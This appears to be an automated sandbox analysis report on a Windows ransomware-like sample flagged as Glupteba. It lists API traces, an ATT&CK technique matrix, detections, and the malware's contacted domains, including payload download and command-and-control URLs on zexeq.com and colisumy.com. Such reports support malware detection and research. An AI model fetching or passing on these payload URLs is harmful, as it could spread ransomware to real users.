              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_00F38178
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00F40116
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00F382A2
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_00F3834F
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_00F38423
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,3_2_00F387C8
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,3_2_00F3884E
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,3_2_00F37BB3
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00F37E83
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,3_2_00F37E27
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_00F37F83
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00F37F00
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,4_2_00F38178
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00F40116
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00F382A2
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,4_2_00F3834F
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,4_2_00F38423
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,4_2_00F387C8
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,4_2_00F3884E
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,4_2_00F37BB3
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_00F37E83
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,4_2_00F37E27
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,4_2_00F37F83
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_00F37F00
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F42283 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F42283
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F29F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F3FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00F3FE47
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F29F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		OS Credential Dumping2
              System Time Discovery              		1
              Taint Shared Content              		11
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium2
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts3
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		11
              Process Injection              		2
              Obfuscated Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol1
              Screen Capture              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              Services File Permissions Weakness              		1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Services File Permissions Weakness              		1
              Masquerading              		NTDS24
              System Information Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
              Virtualization/Sandbox Evasion              		LSA Secrets1
              Query Registry              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Process Injection              		Cached Domain Credentials151
              Security Software Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Services File Permissions Weakness              		DCSync21
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1390473 Sample: c62d6a8f03122f152f75051babb... Startdate: 12/02/2024 Architecture: WINDOWS Score: 100 35 zexeq.com 2->35 37 colisumy.com 2->37 39 api.2ip.ua 2->39 45 Snort IDS alert for network traffic 2->45 47 Multi AV Scanner detection for domain / URL 2->47 49 Found malware configuration 2->49 51 8 other signatures 2->51 7 c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe 1 17 2->7         started        12 c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe 17 2->12         started        14 c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe 13 2->14         started        16 c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe 2->16         started        signatures3 process4 dnsIp5 43 api.2ip.ua 104.21.65.24, 443, 49729, 49730 CLOUDFLARENETUS United States 7->43 33 c62d6a8f03122f152f...cf3cef3_payload.exe, PE32 7->33 dropped 57 Found stalling execution ending in API Sleep call 7->57 59 Writes a notice file (html or txt) to demand a ransom 7->59 61 Writes many files with high entropy 7->61 18 c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe 1 24 7->18         started        23 icacls.exe 7->23         started        63 Antivirus detection for dropped file 12->63 65 Multi AV Scanner detection for dropped file 12->65 67 Machine Learning detection for dropped file 12->67 file6 signatures7 process8 dnsIp9 41 zexeq.com 199.59.242.150, 49731, 49732, 49734 BODIS-NJUS United States 18->41 25 C:\Users\user\...\wctF86A.tmp.tgvv (copy), MS-DOS 18->25 dropped 27 C:\Users\user\...\wctF411.tmp.tgvv (copy), data 18->27 dropped 29 C:\Users\user\...\wctEA40.tmp.tgvv (copy), data 18->29 dropped 31 42 other malicious files 18->31 dropped 53 Infects executable files (exe, dll, sys, html) 18->53 55 Modifies existing user documents (likely ransomware behavior) 18->55 file10 signatures11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe87%ReversingLabsWin32.Trojan.Glupteba
              c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe79%VirustotalBrowse
              c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe100%AviraHEUR/AGEN.1319085
              c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe100%AviraHEUR/AGEN.1319085
              C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe87%ReversingLabsWin32.Trojan.Glupteba
              C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe79%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              zexeq.com21%VirustotalBrowse
              colisumy.com20%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://colisumy.com/dl/build2.exe$run100%URL Reputationmalware
              http://zexeq.com/files/1/build3.exe$run100%URL Reputationmalware
              http://zexeq.com/raud/get.php100%URL Reputationmalware
              http://colisumy.com/dl/build2.exe100%URL Reputationmalware
              http://zexeq.com/raud/get.phpep100%URL Reputationmalware
              http://www.wikipedia.com/0%URL Reputationsafe
              http://zexeq.com/files/1/build3.exe100%URL Reputationmalware
              https://we.tl/t-OQnsJqCO0%Avira URL Cloudsafe
              http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
              http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true100%Avira URL Cloudmalware
              http://zexeq.com/files/1/build3.exerun100%Avira URL Cloudmalware
              http://colisumy.com/dl/build2.exerun100%Avira URL Cloudmalware
              http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true(100%Avira URL Cloudmalware
              http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0100%Avira URL Cloudmalware
              http://colisumy.com/dl/build2.exerun17%VirustotalBrowse
              http://zexeq.com/files/1/build3.exe$runW=100%Avira URL Cloudmalware
              http://zexeq.com/files/1/build3.exerun16%VirustotalBrowse
              http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637100%Avira URL Cloudmalware
              http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637fo100%Avira URL Cloudmalware
              https://we.tl/t-OQnsJqCOOl0%Avira URL Cloudsafe
              http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe016%VirustotalBrowse
              https://we.tl/t-OQnsJqCOOl0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              api.2ip.ua
              		104.21.65.24
              		truefalse
                		high
                zexeq.com
                		199.59.242.150
                		truetrueunknown
                colisumy.com
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=truetrue
                • Avira URL Cloud: malware
                		unknown
                http://zexeq.com/raud/get.phptrue
                • URL Reputation: malware
                		unknown
                https://api.2ip.ua/geo.jsonfalse
                  		high
                  http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637true
                  • Avira URL Cloud: malware
                  		unknown
                  http://zexeq.com/files/1/build3.exetrue
                  • URL Reputation: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.2ip.ua/geo.jsonebc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://api.2ip.ua/geo.jsonrQc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://colisumy.com/dl/build2.exe$runc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2325285876.00000000032C0000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://www.amazon.com/c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1885790444.0000000003780000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).30264859306.ttf.2.dr, 37262344671.ttf.2.drfalse
                          		high
                          http://zexeq.com/files/1/build3.exe$runc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2325285876.00000000032C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          http://www.twitter.com/c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886331763.0000000003780000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            http://www.openssl.org/support/faq.htmlc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exefalse
                              		high
                              https://www.google.comc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315011643.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886601267.0000000003780000.00000004.00001000.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://api.2ip.ua/geo.jsonsMhmO(c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Errorc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exefalse
                                  • Avira URL Cloud: safe
                                  		low
                                  https://we.tl/t-OQnsJqCOc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315011643.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2325329106.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315771340.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.2ip.ua/geo.jsonWThc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000004.00000002.1800715864.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.2ip.ua/geo.jsonMbc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.2ip.ua/geo.jsonuc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000003.1864586284.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://colisumy.com/dl/build2.exerunc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 17%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://api.2ip.ua/kc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000004.00000002.1800715864.0000000000757000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.2ip.ua/geo.jsonoXc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000003.1864586284.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://zexeq.com/files/1/build3.exerunc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • 16%, Virustotal, Browse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.reddit.com/c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886250459.0000000003780000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.2ip.ua/vc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true(c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://api.2ip.ua/geo.json(hc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • 16%, Virustotal, Browse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.nytimes.com/c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886173018.0000000003780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
